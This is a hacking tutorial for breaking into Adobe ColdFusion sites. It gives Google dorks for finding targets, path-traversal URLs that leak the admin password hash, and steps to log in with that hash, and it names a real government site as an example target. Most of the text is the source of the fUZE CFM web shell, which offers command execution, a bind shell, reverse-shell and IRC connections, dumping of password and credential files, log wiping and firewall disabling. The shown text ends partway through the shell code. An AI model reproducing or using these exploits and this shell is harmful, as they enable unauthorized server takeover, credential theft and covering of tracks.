[TUTORIAL] ColdFusion Exploit – Hack Big Sites With Ease!

coldfusion_shockwave_flash_patch-680x400This tutorial gives you a basic understanding of a ColdFusion exploit. A scary thing is, very many government and military websites use this software… but only about 15% are vulnerable. If you use ColdFusion on your web server, I would recommend you check it against such an attack. Well, let’s get started!

You will need:

  • Suggested – VPN, Proxy or Tor
  • A Javascript Snippet – Will Be Provided Later On
  • Tamper Data – Firefox (Tor) Plugin

Finding a site that uses Coldfusion:

This is extremely easy by the use of the “ext” google dork and inurl for your site:

Code:

ext:cfm

Testing to see it’s vulnerable:

The way we test to see if the site’s vulnerable, is by first going to the admin panel. So, for example, if we have the following URL:

Code:

http://site/random/directories/shit/lol/document.cfm

We would then go to:

Code:

http://site/CFIDE/administrator

This will then display us the Adobe ColdFusion administrator panel unless we’re denied access to the panel. You should see a page like this:

Coldfusion

You’re now going to want to take a note of the Adobe ColdFusion version, this is viewable on the administrator panel. Adobe ColdFusion version 6, 7 and 8 are vulnerable to this attack only. For other versions see 9 & 10 at the bottom of the thread.

I’ve found a vulnerable version, now what do I do?

You’re going to want to follow the exploits below, depending on the version. Please bare in mind, these next parts all have to be done within 30 seconds, as the salt changes every 30 seconds!

(For Version 9 and 10 – Please look near to the bottom of the thread.

Version 6

Code:

http://site/CFIDE/administrator/enter.cfm?locale=..\..\..\..\..\..\..\..\CFusionMX\lib\password.properties%00en

Version 7

Code:

http://site/CFIDE/administrator/enter.cfm?locale=..\..\..\..\..\..\..\..\CFusionMX7\lib\password.properties%00en​

Version 8

Code:

http://site/CFIDE/administrator/enter.cfm?locale=..\..\..\..\..\..\..\..\ColdFusion8\lib\password.properties%00e​n

If the exploit is successful, the administrator’s password hash value will be displayed on the password. I currently have no vulnerable sites so I cannot show you an example.

Version 9 & 10

You’re going to want to install Python. This tutorial is quite dependent on your operating system. I will be focusing on Windows as that’s what most of you use. I may write up one for Linux in the future.

First of all, install Python and then install Python Requests (http://docs.python-requests.org/en/latest/). Then save the following script to your Desktop as a.py: http://www.exploit-db.com/exploits/25305/

Windows users:

Open up command prompt and CD to the desktop

Code:

cd desktop

Then to run the script just enter in the name, if you saved it as a.py like I told you then just type:

Code:

a.py

This should run the script.

You now need to enter the URL ONLY, don’t put /CFIDE/ after it. Just the URL. If the url is:

Code:

http://dtsc.ca.gov/CFIDE/administrator/

Then you would put the URL like this:

Code:

http://dtsc.ca.gov

Example:

Cold-2

If you get the following feedback, then it is not vulnerable:

 

Cold-3

If it is vulnerable, you will get feedback from the script with the HMAC. Then proceed to the following steps.

How can I login with a hashed password?

Now, here comes the tricky part!

You’re going to make sure you have scripts enabled (for those who have NoScript) – Enter the following javascript code into your browser – although it works better if you use Scratchpad (Shift + F4 for Firefox / Ctrl + Alt + N for Chrome users):

Code:

javascript:alert(hex_hmac_sha1(document.loginform.salt.value,document.loginform.​cfadminPassword.value))

NOTE: IF YOU ARE USING SCRATCHPAD DO NOT INCLUDE THE “java-script:” PART AS IT WILL NOT WORK

You will get an alert with the HMACed hash. Copy this value. Next, start Tamper Data and click “Start Tamper” then click login, and paste the hash you obtained from the javascript in the cfadminPassword field.

If you were fast enough, you will now be logged in! Congratulations if you did it right!

Shelling The Server

What’s the point of gaining access to the administrator panel if we can’t even shell the server? Well, I’m going to tell you how we can!

You’re going to need to have an Adobe ColdFusion Shell. You can try with a regular PHP Shell or an ASP shell but these are usually blocked. I’ve not been able to find this shell publically anywhere else, and is relatively private. So, for the first time I’m going to be posting here. This is the entire fUZE CFM Shell and is the current best public CFM Shell:

Code:

<html>

<!—
#======================================#
# DeV: XiX .### 9/26/11 #
# # #
# ### /##/ #
# # ,# #
# v3r 1.2 \#####` #
#======================================#
# FuZE #
#======================================#
# #
# Changes in this release: #
# > AutoPWN improved #
# #
# ThX ^_^: #
# > fractal – css & jquery #
# > chippy1337 #
# > MoJiNao, xXx, & Seraph #
# #
#======================================#
—>

<!— _________Login_config_________ —->
<cfset UserName=”Ultimate”>
<cfset Password=”32250170a0dca92d53ec9624f336ca24″> <!— MD5 —>
<!— —————————— —->

<head>
<cfsetting requesttimeout=”3600″>
<cfset tickBegin = GetTickCount()>
<cfset so = CreateObject(“java”, “java.lang.System”)>
<cftry>
<cfobject type=”com” class=”scripting.filesystemobject” name=”fso” action=”connect”>
<cfcatch type=”any”>
<cftry>
<cfobject type=”com” class=”scripting.filesystemobject” name=”fso” action=”create”>
<cfcatch> <!— N/A —> </cfcatch>
</cftry>
</cfcatch>
</cftry>
<cfif isDefined(“FSO”)><cfset Drives = FSO.Drives></cfif>
<cfset icon = “data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAESElEQVR42u2VW0ibZxzG3y/xEKPxlFjrYSqWFkXxgPUAzjCJurkLW+rooL3pTe9Km4uW3ll3V+YYyOjN2EAEUQRjMjwNhI0Zg0zCrAYRvHCIh0HUiOdj0uf5yFe0cTUbpr3xhZd8id/7Pr//8z8oiY+8pEuAjyFaVlamPT4+jnQ6nZ4PBmAymXITExMfxMTE1Gq12pylpaU/e3t7Pws5QG1trSEuLu77vLy8e7GxsWr+dnR0JCYnJ3/t6Oj4IqQA9fX1BVlZWX3Z2dmfhIeHC5VKJWC9ODg4EBMTE7bOzs7bIQOoq6u7npOT40hPTzco4j6fTxweHoq9vT0xOzvb3d7e/nVIAIxGowaRj+fm5uZHRES8jZx7YWHh7/X19WG32z04NDRkCQkAon9RWVnZrNFohFqtloV3d3cPZ2ZmHm9sbPw4MDDgVd69cIDy8nJ9UVHRHKzXMXraToDp6Wkziq713fcvHADt9ryiouJlVFSUCAsLkyt+eXn5t8XFRZPVavWFHKCxsdGF3OfRfkmShNfrFePj41+tra05t7a2jlCQHnzf/leA0tLSOFh3F71rwmc+oriCIlLzIn8uJ1E81WeJl5SU3EAKZjBwpMjISBmADuCM2NnZEdvb22J+ft48PDzcGgCAwxKozWlpac3JycmxtI/Vy0u4KL6/vy8YSVdX182zAKqrq5uQ/28w6QRbj4s1QIjNzU3hcDj4bMYMCARA1f4A6x7xsCKuXMDFS9i/Ho/H2d3dHQBQWFgoZWZmzl7Dov1K3xMc+Rcul0usrKyI+Ph4M55PA+Dw5wUFBYMYlRIrV4mYorReiYITDDY6LRZLAAAc/LK4uLgfs16OngOHwnNzcwKtJ8MzDampqWaM4dMAsM2G3cDDSuQomD9woAeiB4RQQJBPN3LYc4b9Iwj+Uwqtrq7KogjmW6TtH8IwAL8jv09NTf11CgA5X05KSrpqMBgE2wcgDuhW2Ww2rwhiYerdQtFaOXQYACHw/fXo6GjReWdlgJSUlF2IayhOWgB8NzIy8iwYcaROj6gmUDvpBGCh0i3cdWdsbKw3KAA4sASAFBYgc48L7HDAiOnle99h2K5DtH1oOSPFWSOY8wK1ZEf0VcEEIAPAfltCQkKDTqeTLWQUyJkF3fAz9jFyyRZVQUhCganYJWjPq3jnKYRvsFXpHPOO530EcdNut7uCBtDr9bcQvRUtItcAo+Gl/GRFs6242SHc/F15h3YTmH3OgYP3zf39/a3BiL8F4EIKrMg9i4k1IINwU1h55nRTALiU4URxTjn87Sf8w3kYrPgpAKRBC/pOONFAJ5BHwZRER0fLm/VBGEIQgC1FcQojFayVV2jbJ21tbUF1TgAAV0ZGhgSx+xB7Doh8BYKOKBAEYA34e9oHiNcQftHS0vLLfxE+E+DkqqmpyUJhxp90wZ8Gye+ADx3gbmpqWvw/wucCfKh1CXAJ8AZf/R8/6E7SXwAAAABJRU5ErkJggg==”>
<cfset icon_close = “data:image/gif;base64,/9j/4AAQSkZJRgABAQEASABIAAD/2wBDAAUDBAQEAwUEBAQFBQUGBwwIBwcHBw8LCwkMEQ8SEhEPERETFhwXExQaFRERGCEYGh0dHx8fExciJCIeJBweHx7/2wBDAQUFBQcGBw4ICA4eFBEUHh4eHh4eHh4eHh4eHh4eHh4eHh4eHh4eHh4eHh4eHh4eHh4eHh4eHh4eHh4eHh4eHh7/wAARCAANAA0DASIAAhEBAxEB/8QAFQABAQAAAAAAAAAAAAAAAAAABgT/xAAlEAACAgAEBQUAAAAAAAAAAAABAwIEAAUREgYHIUFhEzFCcaH/xAAVAQEBAAAAAAAAAAAAAAAAAAAGB//EABgRAQADAQAAAAAAAAAAAAAAAAEAAgMR/9oADAMBAAIRAxEAPwA9SsMvZrdQqw9Ta9iQkfUkYSju/D474Kc1cxLnZfBLGRiuLB1kdT1j1OD93i67ZezYlaFSdJ2yBOpkSTqT3I9h9Yi4lzuxnDkusLhGcI7TKPz8nzisNunIezxa2Fn/2Q==”>
<title>.:: &fnof;uZE Shell ::.</title>
<link rel=”SHORTCUT ICON” href=”<cfoutput>#icon#</cfoutput>”>
<style type=”text/css”>
html,body{font-family:Verdana,Arial,Helvetica,sans-serif;font-size:11px;background-color:black;color:#bbbbbb;height:98%;overflow:inherit}
table.header-table td { padding:10px; border-width:5px; border-style:outset; }
table.content-table td { padding:10px; border-width:5px; border-style:outset; }
table.function-table td { padding:10px; border-width:5px; border-style:outset; }
textarea.report { width:100%;min-width:400px;background-color:black;color:#bbbbbb; }
#mask { position:absolute; z-index:9000; background-color:#000; display:none; }
#boxes .window { position:fixed; left:0; top:0; width:530px; display:none; z-index:9999; padding:20px; background-color:black;color:#bbbbbb;border-left:solid 1px #00009f;border-right:solid 1px #00009f;border-bottom:solid 1px #00009f; }
#layer1_handle{position:relative;background-color:#00009F;padding:2px;text-align:center;color:#FFF;vertical-align:middle;top:-35px;margin-left:-21px;margin-right:-21px;}
#_close{float:right;text-decoration:none;color:#FFF;}
#_color{background-color:black;color:#bbbbbb;}
#nav a{height:14px;display:block;border:1px solid #000;color:#FFF;text-decoration:none;background-color:#000098;padding-bottom:5px}
#nav a:hover{background-color:#696AF6;color:#FFF}
._btn{padding:0;margin:0;width:80px;font-size:12px;background-color:#0000B0;color:#bbbbbb;}
.container{position:relative;top:-115px;text-align:center;font-size:14px;float:right;}
.menu{position:relative;top:-21px;height:20px;width:280px;float:right;padding-top:5px;padding-bottom:5px;}
</style>
<script type=”text/javascript” src=”http://ajax.googleapis.com/ajax/libs/jquery/1/jquery.min.js”></script>
<script>
$(document).ready(function() {
//select all the a tag with name equal to modal
$(‘a[name=modal]’).click(function(e) {
//Cancel the link behavior
e.preventDefault();
//Get the A tag
var id = $(this).attr(‘href’);
//Get the screen height and width
var maskHeight = $(document).height();
var maskWidth = $(window).width();
//Set height and width to mask to fill up the whole screen
$(‘#mask’).css({‘width’:maskWidth,’height’:maskHeight});
//transition effect
$(‘#mask’).fadeIn(1000);
$(‘#mask’).fadeTo(“slow”,0.8);
//Get the window height and width
var winH = $(window).height();
var winW = $(window).width();
//Set the popup window to center
$(id).css(‘top’, winH/2-$(id).height()/2);
$(id).css(‘left’, winW/2-$(id).width()/2);
//transition effect
$(id).fadeIn(2000);
});
//if close button is clicked
$(‘.window .close’).click(function (e) {
//Cancel the link behavior
e.preventDefault();
$(‘#mask, .window’).hide();
});
//if mask is clicked
$(‘#mask’).click(function () {
$(this).hide();
$(‘.window’).hide();
});
});
</script>
</head>
<body>

<cfif IsDefined(“LoginButton”)>
<cfif Form.UserName eq “#UserName#” and Hash(“#Form.Password#”) eq “#Password#”>
<cflogin>
<cfloginuser name=”#UserName#” password=”#Password#” roles=”admin”>
</cflogin>
</cfif>
</cfif>

<cfif IsDefined(“LogoutButton”)>
<cflogout>
</cfif>

<cfif IsUserLoggedIn() eq “Yes”>
<div id=”boxes”>
<div id=”execute” class=”window”>
<div id=”layer1_handle”><a href=”#” id=”_close” class=”close”><img src=”<cfoutput>#icon_close#</cfoutput>” border=0></a>Console</div>
<center><pre>:: Execute command on server ::</pre></center>
<form method=”POST” action=”<cfoutput>#CGI.SCRIPT_NAME#</cfoutput>”>
<input type=”text” id=”_color” name=”exec” size=40 <cfif isdefined(“Form.exec”)>value=”<cfoutput>#htmleditformat(Form.exec)#</cfoutput>”</cfif>>
<input name=”submit” value=”Execute” class=”_btn” type=”submit”><br />
<input type=checkbox name=”nolimit”> No execution time limit
</form><br />
</div>
<div id=”edit” class=”window”>
<div id=”layer1_handle”><a href=”#” id=”_close” class=”close”><img src=”<cfoutput>#icon_close#</cfoutput>” border=0></a>Edit</div>
<center><pre>:: Edit file ::</pre></center>
<form method=”POST” action=”<cfoutput>#CGI.SCRIPT_NAME#</cfoutput>”>
File path | <input type=”text” id=”_color” name=”EditFile” size=40 <cfif isDefined(“Form.EditFile”)>value=”<cfoutput>#htmleditformat(Form.EditFile)#</cfoutput>”</cfif>>
<input name=”submit” value=”Edit” class=”_btn” type=”submit”>
</form><br />
</div>
<div id=”reverse” class=”window”>
<div id=”layer1_handle”><a href=”#” id=”_close” class=”close”><img src=”<cfoutput>#icon_close#</cfoutput>” border=0></a>Reverse Shell</div>
<center><pre>:: Reverse shell ::</pre></center>
<form method=”POST” action=”<cfoutput>#CGI.SCRIPT_NAME#</cfoutput>”>
<center><input type=”text” id=”_color” name=”reverseip” size=15 <cfif isDefined(“Form.reverseip”)>value=”<cfoutput>#htmleditformat(Form.reverseip)#</cfoutput>”</cfif>> :
<input type=”text” id=”_color” name=”reverseport” size=5 <cfif isDefined(“Form.reverseport”)>value=”<cfoutput>#htmleditformat(Form.reverseport)#</cfoutput>”</cfif>>
<input name=”submit” value=”Connect” class=”_btn” type=”submit”></center>
</form>
</div>
<div id=”bind” class=”window”>
<div id=”layer1_handle”><a href=”#” id=”_close” class=”close”><img src=”<cfoutput>#icon_close#</cfoutput>” border=0></a>Bindshell</div>
<center><pre>:: Bindshell ::</pre></center>
<form method=”POST” action=”<cfoutput>#CGI.SCRIPT_NAME#</cfoutput>”>
<center>[1024-65535] <input type=”text” id=”_color” name=”bindport” size=10 <cfif isdefined(“Form.bindport”)>value=”<cfoutput>#htmleditformat(Form.bindport)#</cfoutput>”</cfif>>
<input name=”submit” value=”Bind” class=”_btn” type=”submit”>
<a href=”data:text/html;base64,PGh0bWw+Cjxib2R5Pgo8aDI+VGlwczwvaDI+Cjx1bD4KPGxpPkRpc2FibGUgdGhlIGZpcmV3YWxsIGJlZm9yZSB1c2luZyB0aGlzIGZ1bmN0aW9uIChuZXRzaCBmaXJld2FsbCBzZXQgb3Btb2RlIGRpc2FibGUpLjwvbGk+CjxsaT5EbyBub3Qgc3RvcCB0aGUgcmVxdWVzdCBvciB0aGUgYmluZHNoZWxsIHdpbGwgZmFpbCwgYW5kIHlvdSB3aWxsIG5lZWQgdG8gdXNlIGFub3RoZXIgcG9ydDwvbGk+CjxsaT5UaGUgYmluZHNoZWxsIG9ubHkgYWNjZXB0cyB2YWxpZCBleGVjdXRhYmxlcyBmcm9tIHdpdGhpbiB0aGUgT1MncyBkZWZpbmVkIFBBVEhzLiBNYWtlIHN1cmUgaXQgZXhpc3RzLCBhbmQgaXQgaXMgaW4gb25lIG9mIHRoZSBkaXJlY3RvcmllcyBkZWZpbmVkIGJ5IHRoZSBlbnZpcm9ubWVudCAncGF0aCcgdmFyaWFibGUuIEZvciBleGFtcGxlIChXaW5kb3dzKSwgJ2RpcicgZG9lcyBub3QgZXhpc3QsIGJ1dCAnaG9zdG5hbWUnIGRvZXMuPC9saT4KPGxpPlRoaXMgaXMgYSBWRVJZIHVuc3RhYmxlIENGIGJpbmRzaGVsbCAocHJvdG90eXBlKSEgTGF0ZXIgcmVsZWFzZXMgd2lsbCBmaXggdGhlIHZhcmlvdXMgaXNzdWVzIGluIHRoZSBwcmVzZW50IG9uZS48L2xpPgo8L3VsPgo8L2JvZHk+CjwvaHRtbD4K”> [Tips]</a></center>
</form>
</div>
<div id=”functions” class=”window”>
<div id=”layer1_handle”><a href=”#” id=”_close” class=”close”><img src=”<cfoutput>#icon_close#</cfoutput>” border=0></a>Functions</div>
<center><pre>:: Functions ::</pre></center>
<form method=”POST” action=”<cfoutput>#CGI.SCRIPT_NAME#</cfoutput>”>
<select name=”function” style=”width: 325px”>
<option selected=”yes”>Select a function</option><optgroup label=”ColdFusion”><option>Dump datasource passwords</option><option>Dump CF hashes</option><option>Restart JRUN server (CF)</option><option>Wipe ColdFusion logs</option></optgroup><optgroup label=”Windows”><option>Disable Windows firewall</option><option>Enable Telnet service</option><option>Show opened ports [W]</option><option>Read SAM</option><option>Read SECURITY</option><option>Read SYSTEM</option><option>Read IIS paths</option><option>View open sessions [W]</option><option>View local shares</option><option>View domain shares</option><option>View users</option><option>View running processes [W]</option><option>View system info [W]</option><option>Check disk for consistency</option></optgroup><optgroup label=”Linux”><option>Find SUID files</option><option>Find SGID files</option><option>Find all *conf* files</option><option>Find all .*_history files</option>
<option>Find all *.pwd files</option><option>Find all .*rc files</option><option>Find all writable directories and files</option><option>Find all writable directories and files in current dir</option><option>Read /etc/passwd</option><option>Read /etc/shadow</option><option>Read /proc/self/environ</option><option>Show opened ports [L]</option><option>View open sessions [L]</option><option>View recent sessions</option><option>View running processes [L]</option>
<option>View memory info</option><option>View CPU info</option><option>View system info [L]</option></optgroup></select><input name=”submit” value=”Execute” class=”_btn” type=”submit”></form>
</div>
<div id=”decrypt” class=”window”>
<div id=”layer1_handle”><a href=”#” id=”_close” class=”close”><img src=”<cfoutput>#icon_close#</cfoutput>” border=0></a>Decrypter</div>
<center><pre>:: CF hash decrypter ::</pre></center>
<form method=”POST” action=”<cfoutput>#CGI.SCRIPT_NAME#</cfoutput>”>
B64 CF hash | <input type=”text” id=”_color” name=”decrypt_hash” size=35 <cfif isdefined(“Form.decrypt_hash”)>value=”<cfoutput>#htmleditformat(Form.decrypt_hash)#</cfoutput>”</cfif>>
<input name=”submit” value=”Decrypt” class=”_btn” type=”submit”>
</form>
</div>
<div id=”updown” class=”window”>
<div id=”layer1_handle”><a href=”#” id=”_close” class=”close”><img src=”<cfoutput>#icon_close#</cfoutput>” border=0></a>File Transfer</div>
<center><pre>:: Upload/Download files on server ::</pre></center>
<form method=”POST” action=”<cfoutput>#CGI.SCRIPT_NAME#</cfoutput>” enctype=”multipart/form-data” name=”Upload” id=”Upload”><center>
<input type=”file” name=”File”/>
<input class=”_btn” type=”submit” name=”Upload” value=”Upload”/></center>
</form>
<form method=”POST” action=”<cfoutput>#CGI.SCRIPT_NAME#</cfoutput>”>
Path | <input type=”text” id=”_color” name=”Download” size=40 <cfif isDefined(“Form.Download”)>value=”<cfoutput>#htmleditformat(Form.Download)#</cfoutput>”</cfif>>
<input name=”submit” value=”Download” class=”_btn” type=”submit”>
</form>
</div>
<div id=”upremote” class=”window”>
<div id=”layer1_handle”><a href=”#” id=”_close” class=”close”><img src=”<cfoutput>#icon_close#</cfoutput>” border=0></a>Remote upload</div>
<center><pre>:: Upload files from remote server ::</pre></center>
<form method=”POST” action=”<cfoutput>#CGI.SCRIPT_NAME#</cfoutput>”>
URL | <input type=”text” id=”_color” name=”RUpload” size=40 <cfif isDefined(“Form.RUpload”)>value=”<cfoutput>#htmleditformat(Form.RUpload)#</cfoutput>”</cfif>>
<input name=”submit” value=”Upload” class=”_btn” type=”submit”>
</form>
</div>
<div id=”runsql” class=”window”>
<div id=”layer1_handle”><a href=”#” id=”_close” class=”close”><img src=”<cfoutput>#icon_close#</cfoutput>” border=0></a>Sql</div>
<center><pre>:: Run SQL query ::</pre></center>
<form method=”POST” action=”<cfoutput>#CGI.SCRIPT_NAME#</cfoutput>”>
SQL query | <input type=”text” id=”_color” name=”exec_sql” size=35<cfif isdefined(“Form.exec_sql”)>value=”<cfoutput>#htmleditformat(Form.exec_sql)#</cfoutput>”</cfif>><br />
Datasource | <input type=”text” id=”_color” name=”datasource” size=15<cfif isdefined(“Form.datasource”)>value=”<cfoutput>#htmleditformat(Form.datasource)#</cfoutput>”</cfif>><br />
User : Pass | <input type=”text” id=”_color” name=”db_username” size=15 <cfif isdefined(“Form.db_username”)>value=”<cfoutput>#htmleditformat(Form.db_username)#</cfoutput>”</cfif>><input type=”text” id=”_color” name=”db_password” size=15 <cfif isdefined(“Form.db_password”)>value=”<cfoutput>#htmleditformat(Form.db_password)#</cfoutput>”</cfif>><br />
<input name=”submit” value=”Run” class=”_btn” type=”submit”>
</form>
</div>
<div id=”scanlan” class=”window”>
<div id=”layer1_handle”><a href=”#” id=”_close” class=”close”><img src=”<cfoutput>#icon_close#</cfoutput>” border=0></a>Scan</div>
<center><pre>:: Scan LAN for CF ::</pre></center>
<form method=”POST” action=”<cfoutput>#CGI.SCRIPT_NAME#</cfoutput>”>
<center><input name=”cfscan” value=”Scan” class=”_btn” type=”submit”></center>
</form>
</div>
<div id=”registry” class=”window”>
<div id=”layer1_handle”><a href=”#” id=”_close” class=”close”><img src=”<cfoutput>#icon_close#</cfoutput>” border=0></a>Registry</div>
<center><pre>:: Registry ::</pre></center>
<form method=”post” action=”<cfoutput>#CGI.SCRIPT_NAME#</cfoutput>”><table>
<tr><td>Path | </td><td><input name=”regpath” type=”text” id=”_color” size=”40″ value=”<cfif isDefined(“Form.regpath”)><cfoutput>#htmleditformat(Form.regpath)#</cfoutput><cfelse>HKEY_LOCAL_MACHINE\</cfif>” /></td></tr><tr>
<td>Key | </td><td><input type=”text” id=”_color” name=”Entry” size=”15″ <cfif isDefined(“Form.Entry”)>value=”<cfoutput>#htmleditformat(Form.Entry)#</cfoutput>”</cfif> /></td></tr><tr>
<td>New key | </td><td><input type=”text” id=”_color” name=”newentry” size=”15″ <cfif isDefined(“Form.newentry”)>value=”<cfoutput>#htmleditformat(Form.newentry)#</cfoutput>”</cfif> /></td></tr></table>
<select name=”regtype”>
<option value=”dWord”>dWord</option>
<option value=”string”>string</option>
</select>
<br />
<input class=”_btn” type=”submit” name=”Submit” value=”Submit” />
</form>
</div>
<div id=”autopwn” class=”window”>
<div id=”layer1_handle”><a href=”#” id=”_close” class=”close”><img src=”<cfoutput>#icon_close#</cfoutput>” border=0></a>AutoPWN</div>
<center><pre>:: AutoPWN remote CF ::</pre></center>
<form method=”POST” action=”<cfoutput>#CGI.SCRIPT_NAME#</cfoutput>”>
Target | http://<input type=”text” id=”_color” name=”target_host” size=40 <cfif isDefined(“Form.target_host”)>value=”<cfoutput>#htmleditformat(Form.target_host)#</cfoutput>”</cfif>>/
<input name=”submit” value=”AutoPWN” class=”_btn” type=”submit”>
</form>
</div>
<div id=”nuke” class=”window”>
<div id=”layer1_handle”><a href=”#” id=”_close” class=”close”><img src=”<cfoutput>#icon_close#</cfoutput>” border=0></a>Nuke</div>
<center><pre>:: Nuke shell ::</pre></center>
<form method=”POST” action=”<cfoutput>#CGI.SCRIPT_NAME#</cfoutput>”>
<center><input name=”nuke” value=”Nuke” class=”_btn” type=”submit”></center>
</form>
</div>
<div id=”irc” class=”window”>
<div id=”layer1_handle”><a href=”#” id=”_close” class=”close”><img src=”<cfoutput>#icon_close#</cfoutput>” border=0></a>IRC</div>
<center><pre>:: IRC datapipe ::</pre></center>
<table>
<form method=”POST” action=”<cfoutput>#CGI.SCRIPT_NAME#</cfoutput>”><center>
<tr><td>IP:</td><td><input type=”text” id=”_color” name=”ircip” size=15 <cfif isDefined(“Form.ircip”)>value=”<cfoutput>#htmleditformat(Form.ircip)#</cfoutput>”<cfelse>value=”127.0.0.1″</cfif>></td></tr>
<tr><td>Port:</td><td><input type=”text” id=”_color” name=”ircport” size=5 <cfif isDefined(“Form.ircport”)>value=”<cfoutput>#htmleditformat(Form.ircport)#</cfoutput>”<cfelse>value=”6667″</cfif>></td></tr>
<tr><td>Nick name:</td><td><input type=”text” id=”_color” name=”ircnick” size=15 <cfif isDefined(“Form.ircnick”)>value=”<cfoutput>#htmleditformat(Form.ircnick)#</cfoutput>”<cfelse>value=”fuZE”</cfif>></td></tr>
<tr><td>User name:</td><td><input type=”text” id=”_color” name=”ircuname” size=15 <cfif isDefined(“Form.ircuname”)>value=”<cfoutput>#htmleditformat(Form.ircuname)#</cfoutput>”<cfelse>value=”fuZE”</cfif>></td></tr>
<tr><td>Real name:</td><td><input type=”text” id=”_color” name=”ircrname” size=20 <cfif isDefined(“Form.ircrname”)>value=”<cfoutput>#htmleditformat(Form.ircrname)#</cfoutput>”<cfelse>value=”fuZE CF IRC Datapipe”</cfif>></td></tr>
<tr><td>Channel:</td><td><input type=”text” id=”_color” name=”ircchan” size=15 <cfif isDefined(“Form.ircchan”)>value=”<cfoutput>#htmleditformat(Form.ircchan)#</cfoutput>”<cfelse>value=”#fuZE”</cfif>></td></tr>
<tr><td><input name=”submit” value=”Connect” class=”_btn” type=”submit”></center></td></tr>
</form>
</table>
</div>
<div id=”mask”></div>
</div>
<table class=”header-table” width=100%>
<tr>
<td><img src=”<cfoutput>#icon#</cfoutput>”><sup> &fnof;uZE Shell 1.2</sup></td>
<td><div style=”float:left;”><cfoutput><pre>#dateformat(now(),’mm-dd-yyyy’)# #timeformat(now(),’HH:mm:ss’)# Your IP: #cgi.remote_addr# [#cgi.remote_host#] Server IP: #cgi.local_addr# [#cgi.http_host#]</pre></cfoutput></div>
<div style=”float:right;”><cfform action=”” method=”post” name=”LogoutForm”><cfinput class=”_btn” type=”submit” name=”LogoutButton” value=”Logout”></cfform></div>
</td>
</tr>
<tr>
<td align=”right”><pre>OS :<br />CF :<br />ID :<br />CWD :<br />Drive info :</pre></td>
<td>
<cfoutput>
<pre>#server.os.name# [#server.os.version#] #server.os.arch#<br />#server.coldfusion.productname# [#server.coldfusion.productlevel#] #server.coldfusion.productversion#<br />#so.getProperty(“user.name”)#<br />#getDirectoryFromPath(getCurrentTemplatePath())#<br /><cfif isDefined(“FSO”)><cfloop collection=”#drives#” item=”this”><cfif this.DriveLetter is not “A”>#this.DriveLetter# [<cfif this.isReady AND ISDefined(“this.TotalSize”)>#NumberFormat(round(evaluate(this.TotalSize/1024/1024/1024)))# GB </cfif><cfswitch expression=”#this.DriveType#”>
<cfcase value=”1″>Removable</cfcase>
<cfcase value=”2″>Fixed</cfcase>
<cfcase value=”3″>Network</cfcase>
<cfcase value=”4″>CDROM</cfcase>
<cfcase value=”5″>RAMDisk</cfcase>
<cfdefaultcase>Unknown</cfdefaultcase>
</cfswitch>] </cfif></cfloop><cfelse>N/A</cfif></pre>
</cfoutput>
</td>
</tr>
</table>

<table class=”content-table” width=100%>
<tr><td width=”75%”><cfoutput>
<cfif isdefined(“Form.exec”)>
<cfif isdefined(“Form.nolimit”)><cfset exectimeout=3600><cfelse><cfset exectimeout=10></cfif>
<cfif server.os.name neq “UNIX”>
<pre>Executing ‘cmd.exe /c #htmleditformat(Form.exec)#'</pre>
<cfexecute name=”cmd.exe” arguments=”/c #Form.exec#” timeout=”#exectimeout#” variable=”cmdout”></cfexecute>
<cfelse>
<pre>Executing ‘sh -c “#htmleditformat(REReplace(Form.exec,””””,”‘”,”ALL”))#”‘</pre>
<cfexecute name=”sh” arguments=”-c “”#REReplace(Form.exec,””””,”‘”,”ALL”)#””” timeout=”#exectimeout#” variable=”cmdout”></cfexecute>
</cfif>
<textarea class=”report” rows=”20″>#htmleditformat(cmdout)#</textarea>
<cfelseif isdefined(“Form.EditFile”)>
<pre>Editing file ‘#htmleditformat(Form.EditFile)#'</pre>
<cftry>
<cfif fileexists(Form.EditFile)>
<!— OK —>
<cfelse>
<cfthrow message=”File not found”>
</cfif>
<cffile action=”Read” file=”#Form.EditFile#” variable=”FileData”>
<form method=”POST” action=”<cfoutput>#CGI.SCRIPT_NAME#</cfoutput>”>
<textarea name=”FileContent” class=”report” rows=”20″><cfoutput>#htmleditformat(FileData)#</cfoutput></textarea>
Save to | <input type=”text” id=”_color” name=”SaveFile” size=40 value=”<cfoutput>#Form.EditFile#</cfoutput>”> <input name=”submit” value=”Save” class=”_btn” type=”submit”>
</form>
<cfcatch><textarea class=”report” rows=”20″>Error<cfif isDefined(“cfcatch.message”)>: <cfoutput>#cfcatch.message#</cfoutput></cfif></textarea></cfcatch>
</cftry>
<cfelseif isDefined(“Form.SaveFile”)>
<pre>Saving file ‘#htmleditformat(Form.SaveFile)#'</pre>
<textarea class=”report” rows=”20″>
<cftry>
<cffile action=”Write” file=”#Form.SaveFile#” output=”#Form.FileContent#” addnewline = “no”>Save success
<cfcatch>Error<cfif isDefined(“cfcatch.message”)>: <cfoutput>#cfcatch.message#</cfoutput></cfif></cfcatch>
</cftry>
</textarea>
<cfelseif isdefined(“Form.bindport”)>
<pre>Binding shell to port #htmleditformat(Form.bindport)#</pre>
<textarea class=”report” rows=”20″>
<cftry>
<cfscript>
try{

// Create socket
serversocket=createObject(“java”,”java.net.ServerSocket”);
serversocket.init(Form.bindport);
writeoutput(“ServerSocket created at port #serversocket.getLocalPort()##chr(10)#”);

// Accept incoming connections
connection=serversocket.accept();
writeoutput(“Connection received from #connection.getInetAddress().getHostName()##chr(10)#”);

// Establish connection
try{
instream=createObject(“java”,”java.io.BufferedReader”).init(createObject(“java”,”java.io.InputStreamReader”).init(connection.getInputStream()));
outstream=createObject(“java”,”java.io.PrintWriter”).init(connection.getOutputStream());
writeoutput(“Connection successful!#chr(10)#”);
} catch (IOException e) {
writeoutput(“IO Exception: Read failed#chr(10)#”);
}

// Communicate
outstream.println(“.:: fuZE CF Bindshell ::.”);
outstream.print(“> “);
outstream.flush();
while(True){
str = instream.readLine();
cmd = str.split(” “);
if (not str.matches(“exit”)){
p = createObject(“java”,”java.lang.ProcessBuilder”).init(cmd).start();
i = createObject(“java”,”java.io.InputStreamReader”).init(p.getInputStream());
br = createObject(“java”,”java.io.BufferedReader”).init(i);
line=br.readLine();
while (isDefined(“line”)) {
outstream.println(line);
outstream.flush();
line = br.readLine();
}
br.close();
i.close();
outstream.print(“> “);
outstream.flush();
}
else {
outstream.println(“Terminating”);
outstream.close();
instream.close();
connection.close();
serversocket.close();
}
}

}catch (Exception e) {
writeoutput(“Exception: Error#chr(10)#”);
}
</cfscript>
<cfcatch>Connection terminated</cfcatch>
</cftry>
</textarea>
